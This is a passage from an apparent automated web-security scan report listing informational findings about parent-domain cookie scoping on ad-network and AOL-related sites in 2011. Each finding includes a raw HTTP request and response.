Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CDJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAe; PRgo=BCBAAsJvCAAuILBBF-19!B; PRimp=79A20400-E860-6779-0309-A36001190200; PRca=|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:56:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2336
Set-Cookie:PRgo=BCBAAsJvCAAuILBBF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=7CA20400-78D9-5794-1209-AE6000670200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

16.19. https://adwords.google.com/select/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=d9rkvy8BAAA.9QCH_JbBItRG1yn60m2UCA.rPxzLsIE8lczIY0qoOwsUA; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=QLzNP4kC0XKUDMg0kcTrMQ:awfe-efe=QLzNP4kC0XKUDMg0kcTrMQ; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=lOtVuDk4DP1zSjJkYgg-7w; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Thu, 05 May 2011 10:52:17 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

16.20. http://adx.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESEAYDROJIBlXAxjjwOAYYXzI&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=558358678
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Thu, 05 May 2011 01:41:34 GMT

GIF89a.............!.......,........@..L..;

16.21. http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/ck/10105-123060-1629-2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/ck/10105-123060-1629-2 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mojo2=17912:1281/16228:26209; mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; svid=822523287793;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo2=10105:1629/17912:1281/16228:26209; expires=Sun, 5-May-2013 5:19:24 GMT; path=/; domain=.mediaplex.com;
Location: http://www.proflowers.com/portalsh?ref=fgvprtlsaol_hp050411_Unknown_DODControl_MdayspecchocMdelightUltmdg&Keyword=PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg_html&Network=AOL_com
Content-Length: 0
Date: Thu, 05 May 2011 10:52:16 GMT


16.22. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10105-123060-1629-2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/10105-123060-1629-2?mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:2060/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:02:57 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=
Content-Length: 0
Date: Thu, 05 May 2011 00:56:26 GMT


16.23. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10105-123060-1629-6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/10105-123060-1629-6?mpt=596776865&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596776865;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sun, 5-May-2013 5:07:38 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596776865&mpt=596776865&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596776865;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=
Content-Length: 0
Date: Thu, 05 May 2011 11:59:38 GMT


16.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 389
Date: Thu, 05 May 2011 00:59:54 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5e
...[SNIP]...

16.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:59:06 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 602
Date: Thu, 05 May 2011 00:59:50 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:6
...[SNIP]...

16.26. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-13

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/tr/10105-123060-1629-13

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/tr/10105-123060-1629-13?mpt=556984181 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:2060/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 5:30:24 GMT; path=/; domain=.mediaplex.com;
Content-Type: image/gif
Content-Length: 49
Date: Thu, 05 May 2011 00:56:26 GMT

GIF89a...................!.......,...........T..;

16.27. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-14

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/tr/10105-123060-1629-14

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/tr/10105-123060-1629-14?mpt=596776863 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sun, 5-May-2013 5:33:42 GMT; path=/; domain=.mediaplex.com;
Content-Type: image/gif
Content-Length: 49
Date: Thu, 05 May 2011 11:59:39 GMT

GIF89a...................!.......,...........T..;

16.28. http://aol.worldwinner.com/cgi/welcome/21sie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aol.worldwinner.com
Path:   /cgi/welcome/21sie

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/welcome/21sie HTTP/1.1
Host: aol.worldwinner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:18 GMT
Server: Apache
Location: http://aol.worldwinner.com/cgi/nosession/aol_sns_handler.pl
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: www.worldwinner.comSID_=9c1aba1127003fc2c6befcde684d7cb1; path=/; domain=.worldwinner.com
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT"
Cache-Control: private
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://aol.worldwinner.com/cgi/nosession/aol_sn
...[SNIP]...

16.29. http://aolmobile.aol.com/registration/changeSettings

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aolmobile.aol.com
Path:   /registration/changeSettings

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration/changeSettings HTTP/1.1
Host: aolmobile.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
